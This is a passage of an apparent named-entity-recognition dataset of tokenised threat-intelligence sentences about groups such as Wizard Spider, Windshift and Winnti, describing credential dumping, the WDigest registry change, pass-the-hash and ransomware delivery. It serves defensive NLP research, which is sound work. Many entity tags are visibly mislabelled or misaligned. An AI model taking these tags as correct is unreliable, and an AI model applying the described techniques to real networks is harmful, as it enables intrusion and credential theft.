- "has", - "used", - "PowerShell", - "for", - "script", - "execution." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "WIRTE", - "has", - "used", - "`regsvr32.exe`", - "to", - "trigger", - "the", - "execution", - "of", - "a", - "malicious", - "script." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "WIRTE", - "has", - "sent", - "emails", - "to", - "intended", - "victims", - "with", - "malicious", - "MS", - "Word", - "and", - "Excel", - "attachments." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "WIRTE", - "has", - "obtained", - "and", - "used", - "Empire", - "for", - "post-exploitation", - "activities." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Org", - "B-OffAct" - ] - }, - { - "tokens": [ - "WIRTE", - "has", - "used", - "VBScript", - "in", - "its", - "operations." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "WIRTE", - "has", - "used", - "HTTP", - "for", - "network", - "communication." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Whitefly", - "has", - "used", - "a", - "simple", - "remote", - "shell", - "tool", - "that", - "will", - "call", - "back", - "to", - "the", - "C2", - "server", - "and", - "wait", - "for", - "commands." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Whitefly", - "has", - "used", - "search", - "order", - "hijacking", - "to", - "run", - "the", - "loader", - "Vcrodat." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "I-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Whitefly", - "has", - "encrypted", - "the", - "payload", - "used", - "for", - "C2." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Whitefly", - "has", - "used", - "an", - "open-source", - "tool", - "to", - "exploit", - "a", - "known", - "Windows", - "privilege", - "escalation", - "vulnerability", - "(CVE-2016-0051)", - "on", - "unpatched", - "computers." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Whitefly", - "has", - "the", - "ability", - "to", - "download", - "additional", - "tools", - "from", - "the", - "C2." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Whitefly", - "has", - "used", - "Mimikatz", - "to", - "obtain", - "credentials." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Whitefly", - "has", - "used", - "malicious", - ".exe", - "or", - ".dll", - "files", - "disguised", - "as", - "documents", - "or", - "images." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-SamFile", - "B-SamFile", - "O", - "B-SamFile", - "I-SamFile", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Whitefly", - "has", - "named", - "the", - "malicious", - "DLL", - "the", - "same", - "name", - "as", - "DLLs", - "belonging", - "to", - "legitimate", - "software", - "from", - "various", - "security", - "vendors." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Whitefly", - "has", - "obtained", - "and", - "used", - "tools", - "such", - "as", - "Mimikatz." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Windigo", - "has", - "used", - "a", - "Perl", - "script", - "for", - "information", - "gathering." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "I-Purp", - "O" - ] - }, - { - "tokens": [ - "Windigo", - "has", - "used", - "a", - "script", - "to", - "gather", - "credentials", - "in", - "files", - "left", - "on", - "disk", - "by", - "OpenSSH", - "backdoors." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Windigo", - "has", - "distributed", - "Windows", - "malware", - "via", - "drive-by", - "downloads." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Windigo", - "has", - "used", - "a", - "script", - "to", - "check", - "for", - "the", - "presence", - "of", - "files", - "created", - "by", - "OpenSSH", - "backdoors." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "Windigo", - "has", - "delivered", - "a", - "generic", - "Windows", - "proxy", - "Win32/Glubteta.M.", - "Windigo", - "has", - "also", - "used", - "multiple", - "reverse", - "proxy", - "chains", - "as", - "part", - "of", - "their", - "C2", - "infrastructure." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Windigo", - "has", - "used", - "a", - "script", - "to", - "detect", - "installed", - "software", - "on", - "targeted", - "systems." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Windigo", - "has", - "used", - "a", - "script", - "to", - "detect", - "which", - "Linux", - "distribution", - "and", - "version", - "is", - "currently", - "installed", - "on", - "the", - "system." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Windshift", - "has", - "used", - "compromised", - "websites", - "to", - "register", - "custom", - "URL", - "schemes", - "on", - "a", - "remote", - "system." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Windshift", - "has", - "used", - "tools", - "to", - "deploy", - "additional", - "payloads", - "to", - "compromised", - "hosts." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Windshift", - "has", - "used", - "revoked", - "certificates", - "to", - "sign", - "malware." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Windshift", - "has", - "used", - "e-mail", - "attachments", - "to", - "lure", - "victims", - "into", - "executing", - "malicious", - "code." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Windshift", - "has", - "used", - "links", - "embedded", - "in", - "e-mails", - "to", - "lure", - "victims", - "into", - "executing", - "malicious", - "code." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Windshift", - "has", - "used", - "icons", - "mimicking", - "MS", - "Office", - "files", - "to", - "mask", - "malicious", - "executables.", - "Windshift", - "has", - "also", - "attempted", - "to", - "hide", - "executables", - "by", - "changing", - "the", - "file", - "extension", - "to", - "\".scr\"", - "to", - "mimic", - "Windows", - "screensavers." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Windshift", - "has", - "used", - "string", - "encoding", - "with", - "floating", - "point", - "calculations." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Windshift", - "has", - "used", - "malware", - "to", - "enumerate", - "active", - "processes." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Windshift", - "has", - "created", - "LNK", - "files", - "in", - "the", - "Startup", - "folder", - "to", - "establish", - "persistence." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Windshift", - "has", - "used", - "malware", - "to", - "identify", - "installed", - "AV", - "and", - "commonly", - "used", - "forensic", - "and", - "malware", - "analysis", - "tools." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Tool" - ] - }, - { - "tokens": [ - "Windshift", - "has", - "used", - "malware", - "to", - "identify", - "installed", - "software." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Windshift", - "has", - "sent", - "spearphishing", - "emails", - "with", - "attachment", - "to", - "harvest", - "credentials", - "and", - "deliver", - "malware." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Windshift", - "has", - "sent", - "spearphishing", - "emails", - "with", - "links", - "to", - "harvest", - "credentials", - "and", - "deliver", - "malware." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Windshift", - "has", - "used", - "fake", - "personas", - "on", - "social", - "media", - "to", - "engage", - "and", - "target", - "victims." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "I-Idus", - "I-Idus", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Windshift", - "has", - "used", - "malware", - "to", - "identify", - "the", - "computer", - "name", - "of", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Windshift", - "has", - "used", - "malware", - "to", - "identify", - "the", - "username", - "on", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Windshift", - "has", - "used", - "Visual", - "Basic", - "6", - "(VB6)", - "payloads." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "I-Tool", - "I-Tool", - "I-Tool", - "O", - "O" - ] - }, - { - "tokens": [ - "Windshift", - "has", - "used", - "tools", - "that", - "communicate", - "with", - "C2", - "over", - "HTTP." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Windshift", - "has", - "used", - "WMI", - "to", - "collect", - "information", - "about", - "target", - "machines." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Winnti", - "Group", - "used", - "stolen", - "certificates", - "to", - "sign", - "its", - "malware." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Winnti", - "Group", - "has", - "registered", - "domains", - "for", - "C2", - "that", - "mimicked", - "sites", - "of", - "their", - "intended", - "targets." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Winnti", - "Group", - "has", - "used", - "a", - "program", - "named", - "ff.exe", - "to", - "search", - "for", - "specific", - "documents", - "on", - "compromised", - "hosts." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Winnti", - "Group", - "has", - "downloaded", - "an", - "auxiliary", - "program", - "named", - "ff.exe", - "to", - "infected", - "machines." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Winnti", - "Group", - "looked", - "for", - "a", - "specific", - "process", - "running", - "on", - "infected", - "servers." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Winnti", - "Group", - "used", - "a", - "rootkit", - "to", - "modify", - "typical", - "server", - "functionality." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Wizard", - "Spider", - "has", - "archived", - "data", - "into", - "ZIP", - "files", - "on", - "compromised", - "machines." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Wizard", - "Spider", - "has", - "used", - "batch", - "scripts", - "that", - "utilizes", - "WMIC", - "to", - "execute", - "a", - "BITSAdmin", - "transfer", - "of", - "a", - "ransomware", - "payload", - "to", - "each", - "compromised", - "machine." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Wizard", - "Spider", - "has", - "used", - "Digicert", - "code-signing", - "certificates", - "for", - "some", - "of", - "its", - "malware." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "B-Way", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Wizard", - "Spider", - "has", - "obtained", - "code", - "signing", - "certificates", - "signed", - "by", - "DigiCert,", - "GlobalSign,", - "and", - "COMOOD", - "for", - "malware", - "payloads." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Time", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Wizard", - "Spider", - "used", - "Base64", - "encoding", - "to", - "obfuscate", - "an", - "Empire", - "service", - "and", - "PowerShell", - "commands." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Wizard", - "Spider", - "has", - "collected", - "and", - "staged", - "credentials", - "and", - "network", - "enumeration", - "information,", - "using", - "the", - "networkdll", - "and", - "psfin", - "TrickBot", - "modules." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "Wizard", - "Spider", - "has", - "collected", - "data", - "from", - "a", - "compromised", - "host", - "prior", - "to", - "exfiltration." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Wizard", - "Spider", - "has", - "shut", - "down", - "or", - "uninstalled", - "security", - "applications", - "on", - "victim", - "systems", - "that", - "might", - "prevent", - "ransomware", - "from", - "executing." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Org", - "O", - "O" - ] - }, - { - "tokens": [ - "Wizard", - "Spider", - "has", - "identified", - "domain", - "admins", - "through", - "the", - "use", - "of", - "`net", - "group", - "\"Domain", - "admins\"", - "/DOMAIN`.", - "Wizard", - "Spider", - "has", - "also", - "leveraged", - "the", - "PowerShell", - "cmdlet", - "`Get-ADComputer`", - "to", - "collect", - "account", - "names", - "from", - "Active", - "Directory", - "data." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-HackOrg", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Wizard", - "Spider", - "has", - "created", - "and", - "used", - "new", - "accounts", - "within", - "a", - "victim's", - "Active", - "Directory", - "environment", - "to", - "maintain", - "persistence." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Wizard", - "Spider", - "has", - "used", - "administrative", - "accounts,", - "including", - "Domain", - "Admin,", - "to", - "move", - "laterally", - "within", - "a", - "victim", - "network." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Wizard", - "Spider", - "has", - "injected", - "malicious", - "DLLs", - "into", - "memory", - "with", - "read,", - "write,", - "and", - "execute", - "permissions." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "I-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "I-Features", - "B-HackOrg" - ] - }, - { - "tokens": [ - "Wizard", - "Spider", - "has", - "leveraged", - "ProtonMail", - "email", - "addresses", - "in", - "ransom", - "notes", - "when", - "delivering", - "Ryuk", - "ransomware." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "Wizard", - "Spider", - "has", - "exfiltrated", - "domain", - "credentials", - "and", - "network", - "enumeration", - "information", - "over", - "command", - "and", - "control", - "(C2)", - "channels." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Wizard", - "Spider", - "has", - "exfiltrated", - "victim", - "information", - "using", - "FTP." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Wizard", - "Spider", - "has", - "exfiltrated", - "stolen", - "victim", - "data", - "to", - "various", - "cloud", - "storage", - "providers." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Org", - "I-Org", - "O" - ] - }, - { - "tokens": [ - "Wizard", - "Spider", - "has", - "exploited", - "or", - "attempted", - "to", - "exploit", - "Zerologon", - "(CVE-2020-1472)", - "and", - "EternalBlue", - "(MS17-010)", - "vulnerabilities." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Features", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "Wizard", - "Spider", - "has", - "accessed", - "victim", - "networks", - "by", - "using", - "stolen", - "credentials", - "to", - "access", - "the", - "corporate", - "VPN", - "infrastructure." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "I-Way", - "I-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Wizard", - "Spider", - "has", - "used", - "file", - "deletion", - "to", - "remove", - "some", - "modules", - "and", - "configurations", - "from", - "an", - "infected", - "host", - "after", - "use." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Wizard", - "Spider", - "has", - "used", - "PowerShell", - "cmdlets", - "`Get-GPPPassword`", - "and", - "`Find-GPOPassword`", - "to", - "find", - "unsecured", - "credentials", - "in", - "a", - "compromised", - "network", - "group", - "policy." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "B-SamFile", - "B-SamFile", - "B-Way", - "O", - "B-Way", - "O", - "B-Purp", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Wizard", - "Spider", - "can", - "transfer", - "malicious", - "payloads", - "such", - "as", - "ransomware", - "to", - "compromised", - "machines." - ], - "ner_tags": [ - "B-SamFile", - "B-HackOrg", - "O", - "B-Purp", - "B-Features", - "I-Purp", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Wizard", - "Spider", - "has", - "used", - "WMIC", - "and", - "vssadmin", - "to", - "manually", - "delete", - "volume", - "shadow", - "copies.", - "Wizard", - "Spider", - "has", - "also", - "used", - "Conti", - "ransomware", - "to", - "delete", - "volume", - "shadow", - "copies", - "automatically", - "with", - "the", - "use", - "of", - "vssadmin." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Wizard", - "Spider", - "has", - "used", - "Rubeus,", - "MimiKatz", - "Kerberos", - "module,", - "and", - "the", - "Invoke-Kerberoast", - "cmdlet", - "to", - "steal", - "AES", - "hashes." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "B-Way", - "B-Way", - "I-Tool", - "O", - "O", - "O", - "B-Way", - "B-Way", - "O", - "I-Purp", - "I-Purp", - "O" - ] - }, - { - "tokens": [ - "Wizard", - "Spider", - "has", - "used", - "the", - "Invoke-Inveigh", - "PowerShell", - "cmdlets,", - "likely", - "for", - "name", - "service", - "poisoning." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "B-SamFile", - "O", - "O", - "I-Way", - "I-Way", - "O" - ] - }, - { - "tokens": [ - "Wizard", - "Spider", - "has", - "dumped", - "the", - "lsass.exe", - "memory", - "to", - "harvest", - "credentials", - "with", - "the", - "use", - "of", - "open-source", - "tool", - "LaZagne." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Wizard", - "Spider", - "has", - "used", - "stolen", - "credentials", - "to", - "copy", - "tools", - "into", - "the", - "<code>%TEMP%</code>", - "directory", - "of", - "domain", - "controllers." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "I-OffAct", - "I-OffAct", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Wizard", - "Spider", - "has", - "created", - "local", - "administrator", - "accounts", - "to", - "maintain", - "persistence", - "in", - "compromised", - "networks." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "B-Purp", - "O", - "O", - "I-Purp", - "I-Purp", - "I-Purp", - "I-Purp", - "O" - ] - }, - { - "tokens": [ - "Wizard", - "Spider", - "has", - "staged", - "ZIP", - "files", - "in", - "local", - "directories", - "such", - "as,", - "`C:\\PerfLogs\\1\\`", - "and", - "`C:\\User\\1\\`", - "prior", - "to", - "exfiltration." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Wizard", - "Spider", - "has", - "lured", - "victims", - "to", - "execute", - "malware", - "with", - "spearphishing", - "attachments", - "containing", - "macros", - "to", - "download", - "either", - "Emotet,", - "Bokbot,", - "TrickBot,", - "or", - "Bazar." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Way", - "B-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Wizard", - "Spider", - "has", - "lured", - "victims", - "into", - "clicking", - "a", - "malicious", - "link", - "delivered", - "through", - "spearphishing." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Wizard", - "Spider", - "has", - "used", - "scheduled", - "tasks", - "to", - "install", - "TrickBot,", - "using", - "task", - "names", - "to", - "appear", - "legitimate", - "such", - "as", - "WinDotNet,", - "GoogleTask,", - "or", - "Sysnetsf.", - "It", - "has", - "also", - "used", - "common", - "document", - "file", - "names", - "for", - "other", - "malware", - "binaries." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Wizard", - "Spider", - "has", - "modified", - "the", - "Registry", - "key", - "<code>HKLM\\System\\CurrentControlSet\\Control\\SecurityProviders\\WDigest</code>", - "by", - "setting", - "the", - "<code>UseLogonCredential</code>", - "registry", - "value", - "to", - "<code>1</code>", - "in", - "order", - "to", - "force", - "credentials", - "to", - "be", - "stored", - "in", - "clear", - "text", - "in", - "memory.", - "Wizard", - "Spider", - "has", - "also", - "modified", - "the", - "WDigest", - "registry", - "key", - "to", - "allow", - "plaintext", - "credentials", - "to", - "be", - "cached", - "in", - "memory." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Wizard", - "Spider", - "has", - "gained", - "access", - "to", - "credentials", - "via", - "exported", - "copies", - "of", - "the", - "ntds.dit", - "Active", - "Directory", - "database.", - "Wizard", - "Spider", - "has", - "also", - "created", - "a", - "volume", - "shadow", - "copy", - "and", - "used", - "a", - "batch", - "script", - "file", - "to", - "collect", - "NTDS.dit", - "with", - "the", - "use", - "of", - "the", - "Windows", - "utility,", - "ntdsutil." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Way", - "I-Way", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Wizard", - "Spider", - "has", - "used", - "the", - "“net", - "view”", - "command", - "to", - "locate", - "mapped", - "network", - "shares." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Wizard", - "Spider", - "has", - "used", - "the", - "`Invoke-SMBExec`", - "PowerShell", - "cmdlet", - "to", - "execute", - "the", - "pass-the-hash", - "technique", - "and", - "utilized", - "stolen", - "password", - "hashes", - "to", - "move", - "laterally." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "B-Way", - "B-Way", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Wizard", - "Spider", - "has", - "used", - "macros", - "to", - "execute", - "PowerShell", - 